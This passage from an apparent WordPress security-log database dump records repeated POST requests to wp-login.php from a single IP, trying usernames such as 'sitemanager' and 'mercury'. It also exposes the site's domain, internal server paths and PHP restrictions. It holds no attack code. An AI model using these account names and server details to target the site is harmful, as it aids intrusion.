tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745431927.117373;s:12:\"REQUEST_TIME\";i:1745431927;}}','13.201.132.241',0,'2025-04-23 23:42:08','1970-01-01 00:00:00'),(93970,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745431925.2336049;s:12:\"REQUEST_TIME\";i:1745431925;}}','13.201.132.241',0,'2025-04-23 23:42:13','1970-01-01 00:00:00'),(93971,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745432305.1524489;s:12:\"REQUEST_TIME\";i:1745432305;}}','13.201.132.241',0,'2025-04-23 23:48:26','1970-01-01 00:00:00'),(93972,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745432305.1741951;s:12:\"REQUEST_TIME\";i:1745432305;}}','13.201.132.241',0,'2025-04-23 23:48:26','1970-01-01 00:00:00'),(93973,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745432305.1706901;s:12:\"REQUEST_TIME\";i:1745432305;}}','13.201.132.241',0,'2025-04-23 23:48:26','1970-01-01 00:00:00'),(93974,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745432305.1733401;s:12:\"REQUEST_TIME\";i:1745432305;}}','13.201.132.241',0,'2025-04-23 23:48:26','1970-01-01 00:00:00'),(93975,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"125\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"125\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745432305.0967031;s:12:\"REQUEST_TIME\";i:1745432305;}}','13.201.132.241',0,'2025-04-23 23:48:27','1970-01-01 00:00:00'),(93976,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745432686.584337;s:12:\"REQUEST_TIME\";i:1745432686;}}','13.201.132.241',0,'2025-04-23 23:54:48','1970-01-01 00:00:00'),(93977,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"122\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"122\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745432686.5787029;s:12:\"REQUEST_TIME\";i:1745432686;}}','13.201.132.241',0,'2025-04-23 23:54:48','1970-01-01 00:00:00'),(93978,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745432686.580287;s:12:\"REQUEST_TIME\";i:1745432686;}}','13.201.132.241',0,'2025-04-23 23:54:48','1970-01-01 00:00:00'),(93979,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745432686.5779779;s:12:\"REQUEST_TIME\";i:1745432686;}}','13.201.132.241',0,'2025-04-23 23:54:48','1970-01-01 00:00:00'),(93980,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s: